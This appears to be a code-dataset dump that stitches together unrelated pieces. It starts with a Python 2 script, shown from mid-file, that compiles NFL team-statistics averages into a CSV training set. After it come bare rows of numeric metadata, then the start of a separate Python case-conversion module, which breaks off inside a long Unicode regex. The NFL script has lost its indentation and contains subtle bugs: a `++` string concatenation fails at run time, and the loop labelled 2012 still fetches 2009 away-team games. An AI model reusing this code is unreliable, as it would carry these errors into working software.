HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Exporting to .csv file...'
print 'Compiling traing set for 2012 NFL season...'
season2009 = nflgame.games_gen(2012, kind="REG")
f = open('nfl2012ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2012, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Exporting to .csv file...'
print 'All done.'
#export to .csv
#move on to next season, rinse, repeat
| 51.526995
| 457
| 0.476458
| 5,827
| 43,901
| 3.358847
| 0.033808
| 0.029634
| 0.0327
| 0.030656
| 0.951001
| 0.946403
| 0.939454
| 0.93925
| 0.93925
| 0.93925
| 0
| 0.026923
| 0.380675
| 43,901
| 851
| 458
| 51.587544
| 0.692927
| 0.07952
| 0
| 0.94186
| 0
| 0
| 0.078828
| 0.01468
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.124031
| 0.00646
| null | null | 0.122739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
d3fd9275525785d3478344cedc1e7ab74fecf268
| 31,553
|
py
|
Python
|
sample-files/python_sample_01.py
|
93Akkord/monaco-tm
|
cf55cd285ff9ef66d02a55a4326db630a9f76f11
|
[
"MIT"
] | null | null | null |
sample-files/python_sample_01.py
|
93Akkord/monaco-tm
|
cf55cd285ff9ef66d02a55a4326db630a9f76f11
|
[
"MIT"
] | null | null | null |
sample-files/python_sample_01.py
|
93Akkord/monaco-tm
|
cf55cd285ff9ef66d02a55a4326db630a9f76f11
|
[
"MIT"
] | null | null | null |
import re
# Public API of this case-conversion module (what `import *` exposes).
__all__ = [
    'lower_case',
    'upper_case',
    'no_case',
    'snake_case',
    'constant_case',
    'kebab_case',
    'camel_case'
]
# Locale-specific case-mapping overrides applied before str.lower()/.upper().
# Each entry pairs a compiled regexp of affected characters with a
# replacement map: 'tr'/'az' handle the Turkish/Azerbaijani dotted 'İ'
# (U+0130) vs dotless 'ı' (U+0131) distinction; 'lt' handles Lithuanian
# combining-dot forms. -- presumably ported from the JS change-case
# locale tables; verify against upstream.
LANGUAGES = {
    'tr': {
        'regexp': re.compile(r'\u0130|\u0049|\u0049\u0307'),
        'map': {
            '\u0130': '\u0069',
            '\u0049': '\u0131',
            '\u0049\u0307': '\u0069'
        }
    },
    'az': {
        'regexp': re.compile(r'[\u0130]'),
        'map': {
            '\u0130': '\u0069',
            '\u0049': '\u0131',
            '\u0049\u0307': '\u0069'
        }
    },
    'lt': {
        'regexp': re.compile(r'[\u0049\u004A\u012E\u00CC\u00CD\u0128]'),
        'map': {
            '\u0049': '\u0069\u0307',
            '\u004A': '\u006A\u0307',
            '\u012E': '\u012F\u0307',
            '\u00CC': '\u0069\u0307\u0300',
            '\u00CD': '\u0069\u0307\u0301',
            '\u0128': '\u0069\u0307\u0303'
        }
    }
}
# @formatter:off
NON_WORD_REGEXP = re.compile(r'[^A-Za-z\xAA\xB5\xBA\xC0-\xD6\xD8-\xF6\xF8-\u02C1\u02C6-\u02D1\u02E0-\u02E4\u02EC\u02EE\u0370-\u0374\u0376\u0377\u037A-\u037D\u037F\u0386\u0388-\u038A\u038C\u038E-\u03A1\u03A3-\u03F5\u03F7-\u0481\u048A-\u052F\u0531-\u0556\u0559\u0561-\u0587\u05D0-\u05EA\u05F0-\u05F2\u0620-\u064A\u066E\u066F\u0671-\u06D3\u06D5\u06E5\u06E6\u06EE\u06EF\u06FA-\u06FC\u06FF\u0710\u0712-\u072F\u074D-\u07A5\u07B1\u07CA-\u07EA\u07F4\u07F5\u07FA\u0800-\u0815\u081A\u0824\u0828\u0840-\u0858\u08A0-\u08B4\u0904-\u0939\u093D\u0950\u0958-\u0961\u0971-\u0980\u0985-\u098C\u098F\u0990\u0993-\u09A8\u09AA-\u09B0\u09B2\u09B6-\u09B9\u09BD\u09CE\u09DC\u09DD\u09DF-\u09E1\u09F0\u09F1\u0A05-\u0A0A\u0A0F\u0A10\u0A13-\u0A28\u0A2A-\u0A30\u0A32\u0A33\u0A35\u0A36\u0A38\u0A39\u0A59-\u0A5C\u0A5E\u0A72-\u0A74\u0A85-\u0A8D\u0A8F-\u0A91\u0A93-\u0AA8\u0AAA-\u0AB0\u0AB2\u0AB3\u0AB5-\u0AB9\u0ABD\u0AD0\u0AE0\u0AE1\u0AF9\u0B05-\u0B0C\u0B0F\u0B10\u0B13-\u0B28\u0B2A-\u0B30\u0B32\u0B33\u0B35-\u0B39\u0B3D\u0B5C\u0B5D\u0B5F-\u0B61\u0B71\u0B83\u0B85-\u0B8A\u0B8E-\u0B90\u0B92-\u0B95\u0B99\u0B9A\u0B9C\u0B9E\u0B9F\u0BA3\u0BA4\u0BA8-\u0BAA\u0BAE-\u0BB9\u0BD0\u0C05-\u0C0C\u0C0E-\u0C10\u0C12-\u0C28\u0C2A-\u0C39\u0C3D\u0C58-\u0C5A\u0C60\u0C61\u0C85-\u0C8C\u0C8E-\u0C90\u0C92-\u0CA8\u0CAA-\u0CB3\u0CB5-\u0CB9\u0CBD\u0CDE\u0CE0\u0CE1\u0CF1\u0CF2\u0D05-\u0D0C\u0D0E-\u0D10\u0D12-\u0D3A\u0D3D\u0D4E\u0D5F-\u0D61\u0D7A-\u0D7F\u0D85-\u0D96\u0D9A-\u0DB1\u0DB3-\u0DBB\u0DBD\u0DC0-\u0DC6\u0E01-\u0E30\u0E32\u0E33\u0E40-\u0E46\u0E81\u0E82\u0E84\u0E87\u0E88\u0E8A\u0E8D\u0E94-\u0E97\u0E99-\u0E9F\u0EA1-\u0EA3\u0EA5\u0EA7\u0EAA\u0EAB\u0EAD-\u0EB0\u0EB2\u0EB3\u0EBD\u0EC0-\u0EC4\u0EC6\u0EDC-\u0EDF\u0F00\u0F40-\u0F47\u0F49-\u0F6C\u0F88-\u0F8C\u1000-\u102A\u103F\u1050-\u1055\u105A-\u105D\u1061\u1065\u1066\u106E-\u1070\u1075-\u1081\u108E\u10A0-\u10C5\u10C7\u10CD\u10D0-\u10FA\u10FC-\u1248\u124A-\u124D\u1250-\u1256\u1258\u125A-\u125D\u1260-\u1288\u128A-\u128D\u1290-\u12B0\u12B2-\u12B5\u12B8-\u12BE\u12C0\u12C2-\u12C5\u12C8-\u12D6\u12
D8-\u1310\u1312-\u1315\u1318-\u135A\u1380-\u138F\u13A0-\u13F5\u13F8-\u13FD\u1401-\u166C\u166F-\u167F\u1681-\u169A\u16A0-\u16EA\u16F1-\u16F8\u1700-\u170C\u170E-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176C\u176E-\u1770\u1780-\u17B3\u17D7\u17DC\u1820-\u1877\u1880-\u18A8\u18AA\u18B0-\u18F5\u1900-\u191E\u1950-\u196D\u1970-\u1974\u1980-\u19AB\u19B0-\u19C9\u1A00-\u1A16\u1A20-\u1A54\u1AA7\u1B05-\u1B33\u1B45-\u1B4B\u1B83-\u1BA0\u1BAE\u1BAF\u1BBA-\u1BE5\u1C00-\u1C23\u1C4D-\u1C4F\u1C5A-\u1C7D\u1CE9-\u1CEC\u1CEE-\u1CF1\u1CF5\u1CF6\u1D00-\u1DBF\u1E00-\u1F15\u1F18-\u1F1D\u1F20-\u1F45\u1F48-\u1F4D\u1F50-\u1F57\u1F59\u1F5B\u1F5D\u1F5F-\u1F7D\u1F80-\u1FB4\u1FB6-\u1FBC\u1FBE\u1FC2-\u1FC4\u1FC6-\u1FCC\u1FD0-\u1FD3\u1FD6-\u1FDB\u1FE0-\u1FEC\u1FF2-\u1FF4\u1FF6-\u1FFC\u2071\u207F\u2090-\u209C\u2102\u2107\u210A-\u2113\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u212F-\u2139\u213C-\u213F\u2145-\u2149\u214E\u2183\u2184\u2C00-\u2C2E\u2C30-\u2C5E\u2C60-\u2CE4\u2CEB-\u2CEE\u2CF2\u2CF3\u2D00-\u2D25\u2D27\u2D2D\u2D30-\u2D67\u2D6F\u2D80-\u2D96\u2DA0-\u2DA6\u2DA8-\u2DAE\u2DB0-\u2DB6\u2DB8-\u2DBE\u2DC0-\u2DC6\u2DC8-\u2DCE\u2DD0-\u2DD6\u2DD8-\u2DDE\u2E2F\u3005\u3006\u3031-\u3035\u303B\u303C\u3041-\u3096\u309D-\u309F\u30A1-\u30FA\u30FC-\u30FF\u3105-\u312D\u3131-\u318E\u31A0-\u31BA\u31F0-\u31FF\u3400-\u4DB5\u4E00-\u9FD5\uA000-\uA48C\uA4D0-\uA4FD\uA500-\uA60C\uA610-\uA61F\uA62A\uA62B\uA640-\uA66E\uA67F-\uA69D\uA6A0-\uA6E5\uA717-\uA71F\uA722-\uA788\uA78B-\uA7AD\uA7B0-\uA7B7\uA7F7-\uA801\uA803-\uA805\uA807-\uA80A\uA80C-\uA822\uA840-\uA873\uA882-\uA8B3\uA8F2-\uA8F7\uA8FB\uA8FD\uA90A-\uA925\uA930-\uA946\uA960-\uA97C\uA984-\uA9B2\uA9CF\uA9E0-\uA9E4\uA9E6-\uA9EF\uA9FA-\uA9FE\uAA00-\uAA28\uAA40-\uAA42\uAA44-\uAA4B\uAA60-\uAA76\uAA7A\uAA7E-\uAAAF\uAAB1\uAAB5\uAAB6\uAAB9-\uAABD\uAAC0\uAAC2\uAADB-\uAADD\uAAE0-\uAAEA\uAAF2-\uAAF4\uAB01-\uAB06\uAB09-\uAB0E\uAB11-\uAB16\uAB20-\uAB26\uAB28-\uAB2E\uAB30-\uAB5A\uAB5C-\uAB65\uAB70-\uABE2\uAC00-\uD7A3\uD7B0-\uD7C6\uD7CB-\uD7FB\uF900-\uFA6D\uFA70-\uFAD9\uFB00-\uFB
06\uFB13-\uFB17\uFB1D\uFB1F-\uFB28\uFB2A-\uFB36\uFB38-\uFB3C\uFB3E\uFB40\uFB41\uFB43\uFB44\uFB46-\uFBB1\uFBD3-\uFD3D\uFD50-\uFD8F\uFD92-\uFDC7\uFDF0-\uFDFB\uFE70-\uFE74\uFE76-\uFEFC\uFF21-\uFF3A\uFF41-\uFF5A\uFF66-\uFFBE\uFFC2-\uFFC7\uFFCA-\uFFCF\uFFD2-\uFFD7\uFFDA-\uFFDC0-9\xB2\xB3\xB9\xBC-\xBE\u0660-\u0669\u06F0-\u06F9\u07C0-\u07C9\u0966-\u096F\u09E6-\u09EF\u09F4-\u09F9\u0A66-\u0A6F\u0AE6-\u0AEF\u0B66-\u0B6F\u0B72-\u0B77\u0BE6-\u0BF2\u0C66-\u0C6F\u0C78-\u0C7E\u0CE6-\u0CEF\u0D66-\u0D75\u0DE6-\u0DEF\u0E50-\u0E59\u0ED0-\u0ED9\u0F20-\u0F33\u1040-\u1049\u1090-\u1099\u1369-\u137C\u16EE-\u16F0\u17E0-\u17E9\u17F0-\u17F9\u1810-\u1819\u1946-\u194F\u19D0-\u19DA\u1A80-\u1A89\u1A90-\u1A99\u1B50-\u1B59\u1BB0-\u1BB9\u1C40-\u1C49\u1C50-\u1C59\u2070\u2074-\u2079\u2080-\u2089\u2150-\u2182\u2185-\u2189\u2460-\u249B\u24EA-\u24FF\u2776-\u2793\u2CFD\u3007\u3021-\u3029\u3038-\u303A\u3192-\u3195\u3220-\u3229\u3248-\u324F\u3251-\u325F\u3280-\u3289\u32B1-\u32BF\uA620-\uA629\uA6E6-\uA6EF\uA830-\uA835\uA8D0-\uA8D9\uA900-\uA909\uA9D0-\uA9D9\uA9F0-\uA9F9\uAA50-\uAA59\uABF0-\uABF9\uFF10-\uFF19]+')
CAMEL_CASE_REGEXP = re.compile(r'([a-z\xB5\xDF-\xF6\xF8-\xFF\u0101\u0103\u0105\u0107\u0109\u010B\u010D\u010F\u0111\u0113\u0115\u0117\u0119\u011B\u011D\u011F\u0121\u0123\u0125\u0127\u0129\u012B\u012D\u012F\u0131\u0133\u0135\u0137\u0138\u013A\u013C\u013E\u0140\u0142\u0144\u0146\u0148\u0149\u014B\u014D\u014F\u0151\u0153\u0155\u0157\u0159\u015B\u015D\u015F\u0161\u0163\u0165\u0167\u0169\u016B\u016D\u016F\u0171\u0173\u0175\u0177\u017A\u017C\u017E-\u0180\u0183\u0185\u0188\u018C\u018D\u0192\u0195\u0199-\u019B\u019E\u01A1\u01A3\u01A5\u01A8\u01AA\u01AB\u01AD\u01B0\u01B4\u01B6\u01B9\u01BA\u01BD-\u01BF\u01C6\u01C9\u01CC\u01CE\u01D0\u01D2\u01D4\u01D6\u01D8\u01DA\u01DC\u01DD\u01DF\u01E1\u01E3\u01E5\u01E7\u01E9\u01EB\u01ED\u01EF\u01F0\u01F3\u01F5\u01F9\u01FB\u01FD\u01FF\u0201\u0203\u0205\u0207\u0209\u020B\u020D\u020F\u0211\u0213\u0215\u0217\u0219\u021B\u021D\u021F\u0221\u0223\u0225\u0227\u0229\u022B\u022D\u022F\u0231\u0233-\u0239\u023C\u023F\u0240\u0242\u0247\u0249\u024B\u024D\u024F-\u0293\u0295-\u02AF\u0371\u0373\u0377\u037B-\u037D\u0390\u03AC-\u03CE\u03D0\u03D1\u03D5-\u03D7\u03D9\u03DB\u03DD\u03DF\u03E1\u03E3\u03E5\u03E7\u03E9\u03EB\u03ED\u03E